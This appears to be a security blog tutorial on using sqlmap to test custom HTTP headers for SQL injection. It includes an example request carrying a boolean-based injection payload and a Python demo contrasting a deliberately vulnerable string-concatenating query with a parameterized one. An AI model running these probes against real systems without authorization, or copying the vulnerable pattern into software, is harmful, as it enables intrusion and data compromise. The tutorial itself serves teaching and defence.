Okiok

SQL Injection of HTTP headers with sqlmap

When performing penetration testing, sqlmap gives granular control over the various injection points tested during a SQL injection.

For example, the HTTP Cookie header, the HTTP Referer header as well as the HTTP User-Agent header can be attacked by specifying the proper options:

--level=2 // Attack the Cookie header
--level=3 // Attack the User-Agent header, as well as the Referer header
--level=5 // Attack the Host header

But what if we want to inject a custom HTTP header not included in this predefined list? Let us take a look at an actual request to better grasp what it is we’re after.

GET /feedback.html HTTP/1.1
Host: www.superconfigure.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: whatever
Referer: https://www.superconfigure.com/feedback.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,fr;q=0.4
Bacon: injectMe
Cookie: blog=okiok

In this very ordinary query, the HTTP header we are chasing after is Bacon. To have that value tested through sqlmap, we simply change the header as follows, indicating to sqlmap that we have a custom injection point:

Bacon: *

Simple: no --level or --risk is required, and sqlmap will carry out its attack on that HTTP header:

GET /feedback.html HTTP/1.1
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,fr;q=0.4
Accept-Encoding: gzip,deflate
Bacon: ) AND 9816=9267 AND (3941=3941
Host: www.superconfigure.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: whatever
Connection: close
Referer: https://www.superconfigure.com/feedback.html
Cookie: blog=okiok
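
Seen from the application side, the request above only has an effect when the Bacon value is concatenated into a SQL statement. The following is an added example, not code from the original post: a Python/sqlite3 lookup written both ways, where the schema, the function names and the two `1) AND ...` probe values are assumptions constructed in the shape of the payload above.

```python
import sqlite3

PAGE_PAYLOAD = ") AND 9816=9267 AND (3941=3941"   # header value shown above
PROBE_TRUE = "1) AND 1=1 AND (1=1"                # constructed, same shape
PROBE_FALSE = "1) AND 1=2 AND (1=1"               # constructed, same shape

def make_db():
    """In-memory database with constructed sample rows (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE feedback (id INTEGER PRIMARY KEY, campaign INTEGER, body TEXT)")
    db.executemany("INSERT INTO feedback (campaign, body) VALUES (?, ?)",
                   [(1, "great"), (1, "slow"), (2, "ok")])
    return db

def count_vulnerable(db, headers):
    """Concatenates the header into the statement: the client controls SQL syntax."""
    sql = "SELECT COUNT(*) FROM feedback WHERE (campaign = " + headers.get("Bacon", "") + ")"
    return db.execute(sql).fetchone()[0]

def count_parameterized(db, headers):
    """Binds the header as a parameter: it is only ever compared as a value."""
    sql = "SELECT COUNT(*) FROM feedback WHERE (campaign = ?)"
    return db.execute(sql, (headers.get("Bacon", ""),)).fetchone()[0]

def outcome(handler, db, value):
    """Row count for a given Bacon value, or 'sql-error' if the statement broke."""
    try:
        return handler(db, {"Bacon": value})
    except sqlite3.Error:
        return "sql-error"

def compare(db):
    """Run the same header values through both handlers."""
    values = {"benign": "1", "true": PROBE_TRUE, "false": PROBE_FALSE, "page": PAGE_PAYLOAD}
    return {name: (outcome(count_vulnerable, db, v), outcome(count_parameterized, db, v))
            for name, v in values.items()}

if __name__ == "__main__":
    for name, (vuln, safe) in compare(make_db()).items():
        print(f"{name:7} vulnerable={vuln!s:10} parameterized={safe}")
```

In the concatenating handler the true and false probes return different counts and the page's payload breaks the statement, which is the behaviour a boolean-based test observes; the parameterized handler returns 0 for all three because the header never reaches the SQL parser as syntax.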